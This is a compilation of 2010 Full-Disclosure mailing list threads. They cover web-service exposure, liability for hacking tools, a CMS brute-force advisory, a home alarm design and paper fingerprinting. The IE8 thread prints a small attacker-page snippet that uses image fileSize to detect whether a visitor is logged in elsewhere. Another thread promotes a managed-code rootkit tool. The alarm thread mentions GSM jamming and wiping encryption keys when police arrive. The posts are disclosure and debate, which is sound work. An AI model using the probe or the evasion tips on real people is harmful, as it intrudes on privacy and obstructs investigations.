http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] JavaScript exploits via source code disclosure
A proxy or 'web-service firewall' prior to the 'protected' web service is the correct answer. Obfuscating the client code be it JavaScript, Interpreted (Java, CLR, etc) or Native ignores the notion that the client controls hardware, OS, the executing process and the network. Signals can be intercepted at any layer. Any other assertion is ridiculous and a waste of time and effort. -Travis On Thu, May 6, 2010 at 1:08 PM, Elazar Broad ela...@hushmail.com wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Unless you wrap your service methods with some form of an authentication, your webservice's are just as public as any other world accessible part of your site. Are the pages calling these services behind any sort of authentication? On Thu, 06 May 2010 01:44:07 -0400 Ed Carp e...@pobox.com wrote: We've got a lot of JQuery code that calls back-end web services, and we're worried about exposing the web services to the outside world - anyone can view source and see exactly how we're calling our web services. Are there any suggestions or guidelines regarding protecting one's source from such disclosure? Thanks in advance! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQECAAYFAkvi93MACgkQi04xwClgpZjfcgP/d0S5hyRlsAypsOue6A6HVLMpvTXT S3LyNJGpmoMcKAVRldWuIz5kP3dQ3BIHJEEdC1qKLwtSOEgAlxM/1XkMR7zhi4qJUzp0 a2LisyC8k2xgWIYSfmiqG//tDWzME4EeYHZiGo0iK0fDPLLSwnad9+aeEdRdNI2vmfIc N6eQJeo= =4zuK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] go public to avoid jail
It's important to create a thriving market for these utilities, and as part of the internet community to foster their development. The 'malicious code' - profit ecosystem is paramount to maintaining order between corporate, governmental and public interests. lol. -Travis On Mon, May 3, 2010 at 7:08 AM, Dietz Pröpper di...@rotfl.franken.dewrote: Ed Carp: How about not writing a hacking tool in the first place that you know will be used to rip other people off?? Wow...what a concept...OF COURSE he knew the code he was writing was going to be used to rip people off. How about closing mailing lists like the one you posted to? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] go public to avoid jail
Which is why this analogy is flawed. -Travis On Mon, May 3, 2010 at 12:27 PM, Marsh Ray ma...@extendedsubset.com wrote: If your knife is found in a dead body, you've going to have some explaining to do. If it turns out that you're a restaurant supply business that sells 3000 of that model knife a week, then you don't have a problem. If your buddy comes to you and says I'm going to go stab some people and take their money will you construct for me a custom knife particularly well-suited for that purpose and you say sure, here you go, heh, no charge this time and this conversation is recorded as evidence then both of you are going to get prosecuted. No one (seriously, no one) is going to be the least bit impressed by the factories sell knives all the time argument. The point is that you knew this specific knife was intended to be used in for this purpose and you decided to go out of your way to help. Hacking/pen-test tools can definitely push the gray area a bit, but the custom-knife-in-dead-body example does not. - Marsh On 5/3/2010 5:34 AM, Christian Sciberras wrote: No, I'm being damn realistic. If it weren't me providing a knife to my buddy it would be someone else, or some kitchen drawer. Also, why do I go to jail, not the shop owner that sold me the knife? Or the factory owner? It's this guy that should be liable to the crime, not the provider. On Mon, May 3, 2010 at 12:04 PM, Ed Carp e...@pobox.com wrote: Oh, stop it. If you give your buddy a knife, knowing they're going to go out and stab someone with it, you're going to jail, too. Stop playing the fool. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] go public to avoid jail
I once logged a guy on IRC who said he was going to packet me off the face of the tubes. So I sent my Mirc logs to the FBI when i lost my AOL connection. He went to jail forever. -Travis On Mon, May 3, 2010 at 1:56 PM, J Roger securityho...@gmail.com wrote: I can see that you have no experience with the legal system other than what you've seen on TV (which is, to say, none at all). I know this is the Internet but you don't need to be quite so rude. Perhaps I just haven't been arrested (caught) as many times as you have. If you read the IRC logs presented by the prosecution, it is pretty clear what the motive was. I have not seen these IRC logs. Have you? Could you provide a reference for them please? JRoger On Mon, May 3, 2010 at 10:46 AM, Ed Carp e...@pobox.com wrote: I can see that you have no experience with the legal system other than what you've seen on TV (which is, to say, none at all). If you read the IRC logs presented by the prosecution, it is pretty clear what the motive was. Your release it to the public and you have no liability argument will land you in prison if you try it - go to any attorney and ask. Your emotional prove Stephen is a saint attempt at twisting what happens in the legal system doesn't change the FACT that the burden of proof was easily met by the prosecution and that the defense's arguments, while designed to sway people more used to emotional appeals than logic, did little to impress the court, with very predictable results. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] go public to avoid jail
But he was a verified paypal buyer, your honor. lols. -Travis On Thu, Apr 29, 2010 at 12:32 PM, Stephen Mullins steve.mullins.w...@gmail.com wrote: That might work if you went through some sort of official channels with a bill of sale and so forth. Claiming that you sold it to some guy on irc after a paypal payment cleared your account probably wouldn't be much of a defense in court. On Thu, Apr 29, 2010 at 12:05 PM, T Biehn tbi...@gmail.com wrote: Or you could just auction it off to the 'highest bidder.' -Travis On Tue, Apr 27, 2010 at 6:48 PM, J Roger securityho...@gmail.com wrote: An important lesson from childhood, sharing, could help keep you out of jail. According to the following (dated) Wired article, http://www.wired.com/threatlevel/2009/12/stephen-watt/ Stephen Watt got screwed because he supplied his friend with a software tool he wrote and his friend used it to commit a crime. Had Stephen released his tool to the public (with as much or as little fanfare as he liked) would he still have gone to jail? He could make a good argument for legitimate uses of his tool as well. It would be useful for anyone performing a PCI penetration test in compliance with PCI DSS 11.3 Remember kids, sharing is caring (that you not spend the next 2 years in federal prison) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE8 img tag HiJacking
It could be used as a technique for defeating the login images used as
two-factor-authentication by some online services.
The application of using filesize to fingerprint an image is somewhat novel.
This is a decidedly 'old' vector, though.
-Travis
2010/4/21 Владимир Воронцов vladimir.voront...@onsec.ru
Hello Full disclosure!
Once again, unwinding theme HiJacking found a fun way to get the very
least information about the target resource when the user is located at the
attacker.
Already crocked img tag opens new opportunities using the method
fileSize, described here: http://msdn.microsoft.com/en-us/library/ms533752
(v = VS.85). Aspx
Consider a simple example - a Web application after authentication
provides some sort of picture for the user, for example:
http://example.com/getImage.php?image=myAvatar
The attacker, knowing this can create a page to read:
img id=onsec src=http://example.com/getImage.php?image=myAvatar;
input type=button onclick=if (onsec.fileSize 0) (alert ('authorized
on example.com') else (alert ('not authorized on example.com')}
Thus, the attacker learns the simplest case, whether the target user
access to example.com.
Continuing the theme, I want to note that in some cases, can obtain
additional information from the very values of the size of the picture. It
can be any logical information Web applications, say, the same script can
show administrators a picture of the same size, and users - of another.
Thus, we obtain the user rights. And so on.
I'd like to return the size of the method is not only valid images, but
also HTML pages, JSON, etc. But, unfortunately, does not work. Maybe, of
course, there are exceptions, call to investigate the matter.
I have some thoughts on the study of vector images in XML format, because
HTML is often valid XML, and then ...
Check for the test version IE9, but he did not support SVG inside tag
img, but only as a separate tag.
Works in IE8, in Opera 10.52 does not work on check writing, if not
difficult.
Original at russian language: http://oxod.ru/?p=113
--
Best regards,
Vladimir Vorontsov
ONsec security expert
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on
http://pastebin.com/f6fd606da
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] IE8 img tag HiJacking
Hey, you actually posted information! Congrats! Did you learn about this 'information channel' from your numerous 'blackhat' friends? -Travis On Apr 22, 2010 2:17 PM, Dan Kaminsky d...@doxpara.com wrote: Also, Billy Hoffman has done a lot of fun work in this space, see http://www.gnucitizen.org/blog/javascript-remoting-dangers/ 2010/4/22 Dan Kaminsky d...@doxpara.com: Interesting use, using filesize to back into the actual CAPTCHA used for a given query. Sneaky!... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Tool] ReFrameworker 1.1
Awesome. A+ ruin. 2010/4/19 Erez Metula erezmet...@appsec.co.il: Hi all, I'm happy to announce about a new version of ReFrameworker V1.1 ! ReFrameworker is a general purpose Framework modifier, used to reconstruct framework Runtimes by creating modified versions from the original implementation that was provided by the framework vendor. ReFrameworker performs the required steps of runtime manipulation by tampering with the binaries containing the framework's classes, in order to produce modified binaries that can replace the original ones. It was developed to experiment with and demonstrate deployment of MCR (Managed Code Rootkits) code into a given framework. MCR is a special type of malicious code that is deployed inside an application level virtual machine such as those employed in managed code environment frameworks – Java, .NET, Dalvik, Python, etc.. Having the full control of the managed code VM allows the MCR to lie to the upper level application running on top of it, and manipulate the application behavior to perform tasks not indented originally by the software developer. ReFrameworker was demonstrated (in his former incarnation as .NET-Sploit) at BlackHat, Defcon, RSA, OWASP and other places. The new version will be demonstrated this week at SOURCE Boston conference, for the first time. More information on ReFrameworker and MCR will be available with the soon to be published book Managed Code Rootkits, by Syngress publishing. Among its features: - Performs all the required steps needed for modifying framework binaries (disassemble, code injection, reassemble, precompiled images cleaning, etc.) - Fast development and deployment of a modified behavior into a given framework - Auto generated deployers - Modules: a separation between general purpose building blocks that can be injected into any given binary, allowing the users to create small pieces of code that can be later combined to form a specific injection task. - Can be easily adapted to support multiple frameworks by minimal configuration (currently comes preconfigured for the .NET framework) - Comes with many preconfigured proof-of-concept attacks (implemented as modules) that demonstrate its usage that can be easily extended to perform many other things. ReFrameworker, as a general purpose framework modification tool, can be used in other contexts besides security such as customizing frameworks for performance tuning, Runtime tweaking, virtual patching, hardening, and probably other usages - It all depends on what it is instructed to do. It can be downloaded from here: http://www.appsec.co.il/Managed_Code_Rootkits --- Erez Metula ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerabilities in TAK cms
If there were an account lockout after 5 tries would you be telling us about how there was a DOS vector on the same software? -Travis On Mon, Apr 5, 2010 at 4:35 PM, MustLive mustl...@websecurity.com.ua wrote: Hello Full-Disclosure! I want to warn you about security vulnerabilities in TAK cms. It's Ukrainian commercial CMS. - Advisory: Vulnerabilities in TAK cms - URL: http://websecurity.com.ua/4050/ - Timeline: 04.02.2009 - found vulnerabilities. 30.09.2009 - informed owners of web sites where I found these vulnerabilities. Taking into account, that I didn't find any contact data of developer of TAK cms, then I hope, that owners of that site informed him about these vulnerabilities. This is one of those cases with commercial CMS, where developers didn't leave any contact data and there is no information about them in Internet. 19.03.2010 - disclosed at my site. - Details: These are Insufficient Anti-automation and Brute Force vulnerabilities. Insufficient Anti-automation: http://site/about/contacts/ http://site/register/getpassword/ At these pages there is not protection from automated requests (captcha). Brute Force: http://site/auth/ http://site/admin/ In login forms there is no protection from Brute Force attacks. Vulnerable are all versions of TAK cms. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security system
Can't hurt. I don't trust machines in DCs much less VPSs. An adversary with the resources and motivation to kill power, net, and jam GSM when they're pwning your house would probably be able to know about and take out your watchdog box in the same move. -Travis On Fri, Apr 2, 2010 at 9:46 AM, Haris Pilton harispilto...@gmail.com wrote: On Tuesday, March 30, 2010, T Biehn tbi...@gmail.com wrote: Nah, I'm saying a GSM jammer would block your prepaid cell signal. So if your adversary were to cut the power, cut the net AND jam GSM you'd be out of luck in getting notification. Very tru, tho u can combine this with a remote box that reacts iff it no longer cant reach ur home box. Tht wy they cant just block outgoing signals n be clear You can get all fancy and have your program try all methods available. Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc. -Travis On Tue, Mar 30, 2010 at 10:39 AM, ja...@smithwaysecurity.com wrote: Good idea u saying also I should by a gsm jammer this a good idea I will try. Sent from my iPhone On Mar 30, 2010, at 11:30 AM, T Biehn tbi...@gmail.com wrote: Buy a prepaid cell, rig your comp phone up to a battery backup. Breakout board on your Serial port, or from a USB-DB9 RS232 adapter. Have the text messaged banged out on the prepaid, rig wires from the breakout board to the cell phone, rig wires from your security sensors into your breakout board. App to listen on com port send a nice high signal to the pin connecting to your send key. Done. Like, 50$ for the phone incld. minutes. Like less than 20$ for a breakout board. Also, rig the ringer up to an input on the breakout board and you can call your phone to clear your FDE keys from RAM and kill your machine if you think the man is paying a visit once you get a text :) Some adversaries will cut net, hardline, sometimes power. Attacks: GSM jammers, which everyone has. -Travis On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar osca...@gmail.com wrote: Try arduino + internet. 2010/3/27 ja...@smithwaysecurity.com Any one got any ides how I would program a system to call me from a voip network to alert me of a home security breach. Sent from my iPhone ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security system
Buy a prepaid cell, rig your comp phone up to a battery backup. Breakout board on your Serial port, or from a USB-DB9 RS232 adapter. Have the text messaged banged out on the prepaid, rig wires from the breakout board to the cell phone, rig wires from your security sensors into your breakout board. App to listen on com port send a nice high signal to the pin connecting to your send key. Done. Like, 50$ for the phone incld. minutes. Like less than 20$ for a breakout board. Also, rig the ringer up to an input on the breakout board and you can call your phone to clear your FDE keys from RAM and kill your machine if you think the man is paying a visit once you get a text :) Some adversaries will cut net, hardline, sometimes power. Attacks: GSM jammers, which everyone has. -Travis On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar osca...@gmail.com wrote: Try arduino + internet. 2010/3/27 ja...@smithwaysecurity.com Any one got any ides how I would program a system to call me from a voip network to alert me of a home security breach. Sent from my iPhone ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security system
Nah, I'm saying a GSM jammer would block your prepaid cell signal. So if your adversary were to cut the power, cut the net AND jam GSM you'd be out of luck in getting notification. You can get all fancy and have your program try all methods available. Cell, Wired Net, WIFI (throw an antennae on your roof,) pager, etc. -Travis On Tue, Mar 30, 2010 at 10:39 AM, ja...@smithwaysecurity.com wrote: Good idea u saying also I should by a gsm jammer this a good idea I will try. Sent from my iPhone On Mar 30, 2010, at 11:30 AM, T Biehn tbi...@gmail.com wrote: Buy a prepaid cell, rig your comp phone up to a battery backup. Breakout board on your Serial port, or from a USB-DB9 RS232 adapter. Have the text messaged banged out on the prepaid, rig wires from the breakout board to the cell phone, rig wires from your security sensors into your breakout board. App to listen on com port send a nice high signal to the pin connecting to your send key. Done. Like, 50$ for the phone incld. minutes. Like less than 20$ for a breakout board. Also, rig the ringer up to an input on the breakout board and you can call your phone to clear your FDE keys from RAM and kill your machine if you think the man is paying a visit once you get a text :) Some adversaries will cut net, hardline, sometimes power. Attacks: GSM jammers, which everyone has. -Travis On Sat, Mar 27, 2010 at 6:44 PM, Oscar Bacelar osca...@gmail.com wrote: Try arduino + internet. 2010/3/27 ja...@smithwaysecurity.com Any one got any ides how I would program a system to call me from a voip network to alert me of a home security breach. Sent from my iPhone ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] StreamArmor v1.0 has Released!!!
HELLO AND THANK YOU FOR YOUR NOTICE I WILL QUICKLY DOWNLOAD THESE APPLICATIONS AND ERADICATE MY EVIL STREAMS. On Sun, Mar 28, 2010 at 10:15 PM, evil fingers contact.fing...@gmail.com wrote: StreamArmor is the sophisticated tool for discovering hidden alternate data streams (ADS) as well as clean them completely from the system. It's advanced auto analysis coupled with online threat verification mechanism makes it the best tool available in the market for eradicating the evil streams. StreamArmor comes with fast multi threaded ADS scanner which can recursively scan over entire system and quickly uncover all hidden streams. All such discovered streams are represented using specific color patten based on threat level which makes it easy for human eye to distinguish between suspicious and normal streams. StreamArmor has built-in advanced file type detection mechanism which examines the content of file to accurately detect the file type of stream. This makes it great tool in forensic analysis in uncovering hidden documents/images/audio/video/database/archive files within the alternate data streams. StreamArmor is the standalone, portable application which does not require any installation. It can be copied to any place in the system and executed directly. To Read more to Download the tool, check out : http://www.StreamArmor.com What others think about SecurityArmor v1.0? http://www.security-database.com/toolswatch/StreamArmor-v1-the-advanced.html Thank you for choosing Rootkit Analytics! Kind Regards, EF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Administrivia: An Experiment
This will cause segmentation of the 'moderate trolling list' market. I am impressed at your trolling prowess John, you're a natural. -Travis On Wed, Mar 24, 2010 at 2:17 PM, Paul Schmehl pschmehl_li...@tx.rr.com wrote: --On Wednesday, March 24, 2010 15:33:54 + John Cartwright jo...@grok.org.uk wrote: Hi After some deliberation I have decided to try an experiment. Until further notice, new list members will be subject to temporary moderation. Cue the obligatory the world is coming to an end, fd will never be the same, this is a violation of the spirit of fd whining tape.. :-) -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fingerprinting Paper with Laser
Excellent point. Travis On Fri, Mar 19, 2010 at 12:24 PM, james o' hare jamesohar...@googlemail.com wrote: On Thu, Mar 18, 2010 at 6:42 PM, Fetch, Brandon bfe...@tpg.com wrote: But wait! That paper fingerprint can be captured and added to the RFID data already saved! *tongue firmly in cheek* No one would be devious enough to duplicate or forge secured RFID data in our passports now would they? I'm sure The Mossad will try and bypass our technologies. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fingerprinting Paper with Laser
X, The point is that material isn't consistent. Duh. -Travis On Mar 19, 2010 4:58 PM, mrx m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Consider a production line for printing anything that... sample of the material printed/magnetised or otherwise marked during a production run, then only one token need be scanned by laser. This single data set can then be used by access points to verify the validity of said token(s) when prese... So your proposition is that the passport manufacturers all use laser beams on each passport they... - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk ---... iQEVAwUBS6Pj3LIvn8UFHWSmAQI+WQgArwfPjlBMHIxCz5Muag5zO9wAbkQTekk1 LUHjDuV3pXn9TXNWFKoydaYaj6jWafpXFt58BTZLqn8ZgSIcMw+cip2ZNdC7WOQ6 x37ESSboLLfRnRwKVYpPTz7H8yzKNWcEu7nY3fnrO337Tdm8N5hTkgt5KAhq0qRg XM/uOYicd1suk1jEx4gJ4mBXLG59+7baqyT6wnjBRYTfpbeOWdWLpHIKYBmEWoYC CjAphrBvlnWNPEKsQHjS+nFXG7sSaEO6lg88W/Ka4Kt268Hkzl8pYtvwye9U+lFS H7S0GrZR+Vgvrq9+419QwzH3oBbpdEq6tKkvcD74HXlhGB20EJayfA== =KDgR -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http:/... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fingerprinting Paper with Laser
What 'limits'? What 'acceptable range' are you talking about? I think they scan the surface doing pit depth / pit counts like an expensive cd reader. Within this presumption, you have to fingerprint either the whole document or a small square. It cannot be duplicated, it cannot be used to authenticate 'batches.' It could only be included in some piggyback data e.g. in the smartcard. Preferrably signed. With some glorious pki. Keep trying, -Travis On Mar 19, 2010 7:20 PM, mrx m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 valdis.kletni...@vt.edu wrote: On Fri, 19 Mar 2010 20:51:40 -, mrx said: Consider a production line for printing anything ... If deviations in the manufacturing process were consistently between known limits, it still serves as a control. A hacker may learn those limits but then the problem of recreating an equal manufacturing process still remains. Obviously if the deviation in each sample is such that the known level of consistency is so wide that the process is easily replicated then the tech is useless as an indicator of integrity. A bigger concern is whether normal wear and tear will invalidate the measurements - some spots ... Yes I would agree, but for tokens of limited lifetime perhaps there is still potential. Concert tickets, travel tickets etc. Besides one could always force renewal of the token once it's valid lifetime has expired. I still think there may be a potential security benefit here. mrx - -- Mankind's systems are white sticks tapping walls. Thanks Roy http://www.propergander.org.uk --... iQEVAwUBS6QExrIvn8UFHWSmAQJnygf/dUiVo37byk9WFfk1PTigC/ZJNYxr7iuB JZ9Pv/H2d0YI8M/ru54B5Q6rO7RFqDDRJhlgAjLLOY6R1p2D9ai6NvM+yJWfI5eb gtqOLaV6s4KSY2pl40CYXm26cVOmascglyFOdwSdH76Lu8EERqI7woKra6PNBXv2 1olRAcNr8qmYY6DxBDJPZ1Q3J6/FtGIkMHjh1eg3ysoGtgfPk3TQnusgjqgY5Omp 6MG1Q4wPosVCRAH3igvkR8zRLFpkCgBlHsoV/qvK+poPf4o2h5UNqXIK7jVLrz70 RQmZIH+GrWlXjSS1VLYYf+OHe1W0gRirruS2otj14WqfLvyLrKl3iQ== =TlBw -END PGP SIGNATURE- ___ Full-Disclosure - We be... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fingerprinting Paper with Laser
Ridiculous. Generate some valid, non-far-fetched use-cases to justify this if I'm wrong. -Travis On Thu, Mar 18, 2010 at 11:21 AM, james o' hare jamesohar...@googlemail.com wrote: On Thu, Mar 18, 2010 at 3:17 PM, Gadi Evron g...@linuxbox.org wrote: I saw this release today, and just had to share it with anyone I could find. Every paper, plastic, metal and ceramic surface is microscopically different and has its own 'fingerprint'. Professor Cowburn's LSA system uses a laser to read this naturally occurring 'fingerprint'. The accuracy of measurement is often greater than that of DNA with a reliability of at least one million trillion. I love it when old technologies and science are used in interesting new ways to impact the future. http://nanotechwire.com/news.asp?nid=2254 Expect to see this technology at an airport near you, in five years or so. Gadi. As long as it stops The Mossad going to Dubai and assassinating people in hotel rooms, then I'm all for it. Andrew ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by 